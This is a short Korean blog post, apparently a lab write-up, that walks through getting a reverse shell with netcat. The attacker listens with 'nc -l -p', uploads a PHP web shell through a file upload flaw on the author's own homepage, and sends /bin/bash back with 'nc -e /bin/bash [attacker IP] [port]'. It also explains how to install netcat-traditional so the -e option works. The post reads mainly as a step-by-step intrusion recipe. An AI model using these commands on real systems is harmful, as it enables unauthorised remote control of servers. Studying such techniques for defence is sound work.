Web/Attack
리버스 쉘(Reverse Shell) 실습(with netcat)
Alioth02
2024. 7. 21. 00:19
1. 공격자 서버 포트 리스닝
nc -l -p [포트번호]
공격자 서버에서 netcat 도구를 활용해 1024번 포트를 리스닝으로 열어 놓는다.
2. 웹 쉘 업로드
파일 업로드 취약점이 있는 개인 홈페이지에
php로 작성된 웹 쉘을 업로드했다.
3. 리버스 쉘 작성
nc -e /bin/bash [공격자 서버 IP] [포트번호]
더보기
-e 옵션이 사용되지 않을 때
# apt-get install netcat-traditional
# update-alternatives --config nc
ㄴ> 2번 옵션 선택
https://aceatom.tistory.com/346
nc -e 옵션 사용이 안될때
nc를 통해 리버스쉘을 연결하려고 하는데 사진처럼 -e 옵션이 유효하지 않다고 할 때 해결법이다. 검색을 해보니 이 상황은 -e 옵션이 비활성화되어 설치됐기 때문에 Attacker에 리버스연결을 할 수
aceatom.tistory.com
업로드된 웹 쉘에
피해자 서버의 쉘을 공격자의 서버로 전달하는 netcat 명령어를 입력했다.
4. 피해자 서버 장악
공격자 서버에서
피해자 서버의 쉘을 이용할 수 있게 된 모습을 볼 수 있다.